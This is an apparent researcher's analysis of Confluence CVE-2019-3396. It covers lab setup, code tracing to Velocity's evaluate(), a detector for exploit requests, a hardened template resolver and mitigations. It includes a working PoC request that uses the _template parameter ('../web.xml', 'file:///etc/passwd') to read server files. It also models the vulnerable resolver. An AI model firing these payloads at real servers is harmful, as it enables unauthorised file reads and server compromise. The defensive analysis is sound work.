Confluence CVE-2019-3396
https://jira.atlassian.com/browse/CONFSERVER-57974
https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
PoC
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: cqq.com:443
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Referer: https://cqq.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 168

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
Or change it to file:///etc/passwd
to read the passwd file. There are reports online of reading the passwd file this way, but in my locally built environment I did not manage to read /etc/passwd.
Confluence installation
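The two PoC bodies above share one tell-tale: a _template parameter whose value is a traversal path or a URL. The following detector is an added example, not code from the original post or from Atlassian; it classifies macro-preview requests the way a WAF rule or log pipeline would, and the sample requests it runs over are constructed (the first two mirror the PoC, the rest are benign or malformed). The regex for "template escapes" is this example's own heuristic.

```python
"""Flag CVE-2019-3396 exploitation attempts in Confluence macro-preview traffic.

Added example, not code from the original post: a detector for
POST /rest/tinymce/1/macro/preview requests whose widget macro carries a
_template parameter. Sample requests below are constructed.
"""
import json
import re
from urllib.parse import urlparse

PREVIEW_PATH = "/rest/tinymce/1/macro/preview"

# The plugin picks its own template, so a _template value carrying a traversal
# sequence, an absolute path, or a URL scheme (file://, http://, ...) points the
# renderer at an attacker-chosen file. This regex is the example's heuristic.
TEMPLATE_ESCAPES = re.compile(r"\.\.[/\\]|^[/\\]|^[A-Za-z][A-Za-z0-9+.-]*:")


def classify_request(method, path, body):
    """Return the reasons a request looks like CVE-2019-3396 abuse ([] if clean)."""
    reasons = []
    if method.upper() != "POST" or urlparse(path).path != PREVIEW_PATH:
        return reasons
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return reasons
    macro = data.get("macro") if isinstance(data, dict) else None
    params = macro.get("params") if isinstance(macro, dict) else None
    if not isinstance(params, dict):
        return reasons
    # The editor's own preview request never carries _template (see the
    # "Trigger location" section), so its mere presence is worth an alert.
    if "_template" in params:
        reasons.append("_template parameter present in macro preview request")
        template = str(params["_template"])
        if TEMPLATE_ESCAPES.search(template):
            reasons.append("_template escapes the plugin templates: %r" % template)
    return reasons


# Constructed sample traffic: (label, method, path, body).
SAMPLE_REQUESTS = [
    ("poc-web-xml", "POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000",'
     '"_template":"../web.xml"}}}'),
    ("poc-passwd", "POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000",'
     '"_template":"file:///etc/passwd"}}}'),
    ("benign-widget-preview", "POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000"}}}'),
    ("benign-other-macro", "POST", PREVIEW_PATH,
     '{"contentId":"786457","macro":{"name":"code","body":"print(1)",'
     '"params":{"language":"python"}}}'),
    ("unrelated-get", "GET", "/rest/api/content/786457", ""),
    ("garbage-body", "POST", PREVIEW_PATH, "not json at all"),
]


def scan(requests):
    """Map each flagged request's label to its reasons; clean requests are omitted."""
    hits = {}
    for label, method, path, body in requests:
        reasons = classify_request(method, path, body)
        if reasons:
            hits[label] = reasons
    return hits


if __name__ == "__main__":
    for label, reasons in scan(SAMPLE_REQUESTS).items():
        print(label)
        for reason in reasons:
            print("  -", reason)
```

Run as a script it prints the two PoC requests with both reasons each; the benign widget preview, the other macro, the GET and the unparseable body produce nothing. Matching on the presence of _template alone (first reason) is deliberately broad, because the page shows that the editor never sends it.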
$ wget https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.13.0.tar.gz
$ tar zxf atlassian-confluence-6.13.0.tar.gz
$ cd atlassian-confluence-6.13.0
$ vi ./confluence/WEB-INF/classes/confluence-init.properties # set the Confluence home directory; here I set it (uncommented) to
confluence.home=/home/cqq/confluence
$ vi ./conf/server.xml
Remove the comment markers around this block:
<Connector port="8090" connectionTimeout="20000" redirectPort="8443"
maxThreads="48" minSpareThreads="10"
enableLookups="false" acceptCount="10" debug="0" URIEncoding="UTF-8"
protocol="org.apache.coyote.http11.Http11NioProtocol"/>
Then it can be started:
$ bin/start-confluence.sh
After it starts, visit port 8090 and complete the installation step by step.
One of the installation steps is as follows:
PostgreSQL database / user configuration
Previously I mostly installed MySQL; this time I switched to PostgreSQL. For the specific commands see: https://blog.****.net/zhangzeyuaaa/article/details/77941039
$ su - postgres
$ psql -U postgres
psql (10.6 (Ubuntu 10.6-0ubuntu0.18.04.1))
Type "help" for help.
postgres=# CREATE USER wiki WITH PASSWORD 'wiki';
CREATE ROLE
postgres=# CREATE DATABASE wiki OWNER wiki;
CREATE DATABASE
postgres=# GRANT ALL PRIVILEGES ON DATABASE wiki TO wiki;
GRANT
Configuring remote debugging
Edit bin/setenv.sh and add:
CATALINA_OPTS="-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 ${CATALINA_OPTS}" # for debug
Then start Confluence again:
bin/start-confluence.sh
Trigger location
Reference: https://confluence.atlassian.com/doc/widget-connector-macro-171180449.html
Insert (+) => Other macros => Widget Connector
The request sent when clicking Preview does not contain the _template parameter at all:
Analysis
Locating the code, it should be this jar:
confluence/WEB-INF/atlassian-bundled-plugins/widgetconnector-3.1.2.jar
Decompile it to Java source with jd-gui.
vi confluence/WEB-INF/web.xml
The corresponding filter turns out to be:
com.atlassian.confluence.web.filter.DropIfNotSetupFilter
which lives in this jar:
confluence/WEB-INF/lib/confluence-6.13.0.jar
Debugging
I did not know how to remote-debug this jar with the usual IDEA setup; after searching I found that Atlassian has its own debugging approach:
https://developer.atlassian.com/server/framework/atlassian-sdk/creating-a-remote-debug-target/
The Atlassian SDK needs to be downloaded:
https://developer.atlassian.com/server/framework/atlassian-sdk/downloads/
Installation reference:
https://developer.atlassian.com/display/DOCS/Install+the+Atlassian+SDK+on+a+Linux+or+Mac+system
Installing via apt install and via the downloaded deb package both failed,
so try downloading the tar.gz package directly:
wget https://marketplace.atlassian.com/download/plugins/atlassian-plugin-sdk-tgz?_ga=2.59234733.1012239446.1554698071-91862862.1554345070
sudo tar -xvzf atlassian-plugin-sdk-4.0.tar.gz -C /opt
Code tracing
The call chain from the macro down to the template engine:
- WidgetMacro.java
- DefaultRendererManager.java
  widgetRenderer.getEmbeddedHtml(url, params);
- YoutubeRenderer.java
- DefaultVelocityRenderService.java
  return getRenderedTemplate((Map)contextMap);
which finally calls
getVelocityEngine().evaluate(velocityContext, writer, "getRenderedContent", templateContent.toString());
i.e. the
evaluate(Context context, Writer out, String logTag, String instring)
method of org.apache.velocity.app.VelocityEngine:
https://velocity.apache.org/engine/devel/apidocs/org/apache/velocity/app/VelocityEngine.html#evaluate-org.apache.velocity.context.Context-java.io.Writer-java.lang.String-java.lang.String-
Because templateContent is whatever the _template parameter pointed at, evaluate() renders attacker-chosen text as a Velocity template (the SSTI), and the file read that fetches it is what the ../web.xml and file:///etc/passwd payloads above exploit.
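To make the traced step concrete, the following is an added Python model of the template-selection step, not the Widget Connector's Java: a vulnerable resolver that trusts _template as a path or URL (the behaviour the PoC relies on, assumed here rather than copied from the plugin), next to a hardened resolver that only accepts an allowlisted template name resolving inside the templates directory. The directory layout, the web.xml and passwd stand-ins, and the allowlist names are constructed for the demo.

```python
"""Model of the _template flaw traced above, beside a hardened resolver.

Added example, not the Widget Connector's Java: a Python stand-in for the step
where the renderer turns the _template request parameter into template text.
Directory layout, file contents and allowlist are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path
from urllib.request import urlopen

# Hypothetical allowlist; the plugin's real template names are not on the page.
ALLOWED_TEMPLATES = {"youtube.vm", "viddler.vm"}


def load_template_vulnerable(templates_dir, params):
    """Assumed behaviour of the flawed code: _template is trusted as a location.

    A URL (file://, http://, ...) is fetched as-is; anything else is joined onto
    the templates directory with no check that it stays inside it.
    """
    name = params.get("_template", "youtube.vm")
    if "://" in name:
        with urlopen(name) as resp:             # file:///etc/passwd lands here
            return resp.read().decode("utf-8")
    with open(os.path.join(templates_dir, name), encoding="utf-8") as f:
        return f.read()                         # ../web.xml lands here


def load_template_hardened(templates_dir, params):
    """Accept only a known template file that resolves inside templates_dir."""
    name = params.get("_template", "youtube.vm")
    if name not in ALLOWED_TEMPLATES:
        raise ValueError("unknown template %r" % name)
    base = os.path.realpath(templates_dir)
    full = os.path.realpath(os.path.join(base, name))
    # Belt and braces: even an allowlisted name must resolve under the base
    # directory (a symlinked template pointing elsewhere is rejected too).
    if os.path.commonpath([base, full]) != base:
        raise ValueError("template %r escapes %s" % (name, base))
    with open(full, encoding="utf-8") as f:
        return f.read()


def demo():
    """Build a throwaway layout and run both resolvers on PoC-style inputs."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        tdir = os.path.join(root, "templates")
        os.mkdir(tdir)
        with open(os.path.join(tdir, "youtube.vm"), "w", encoding="utf-8") as f:
            f.write('<iframe src="$url"></iframe>')
        # Constructed stand-in for WEB-INF/web.xml one level above the templates.
        with open(os.path.join(root, "web.xml"), "w", encoding="utf-8") as f:
            f.write("<web-app>secret-config</web-app>")
        # Constructed stand-in for /etc/passwd, reached through a file:// URL.
        passwd = os.path.join(root, "passwd")
        with open(passwd, "w", encoding="utf-8") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        file_url = Path(passwd).as_uri()

        results["vuln_traversal"] = load_template_vulnerable(tdir, {"_template": "../web.xml"})
        results["vuln_file_url"] = load_template_vulnerable(tdir, {"_template": file_url})
        for key, tmpl in (("hard_traversal", "../web.xml"), ("hard_file_url", file_url)):
            try:
                load_template_hardened(tdir, {"_template": tmpl})
                results[key] = "allowed"
            except ValueError:
                results[key] = "rejected"
        results["hard_legit"] = load_template_hardened(tdir, {"_template": "youtube.vm"})
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-16s %s" % (key, value.strip()))
```

The vulnerable resolver returns the web.xml stand-in for ../web.xml and the passwd stand-in for the file:// URL, exactly the two reads the PoC performs; the hardened one rejects both and still serves the legitimate template. Note that path containment alone would not stop the file:// case, which is why the allowlist comes first.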
Mitigations
Disable the affected plugins (here the Widget Connector), upgrade, then re-enable them. If upgrading is not possible, the only remaining option is to block the requests (the /rest/tinymce/1/macro/preview endpoint used above) at the firewall.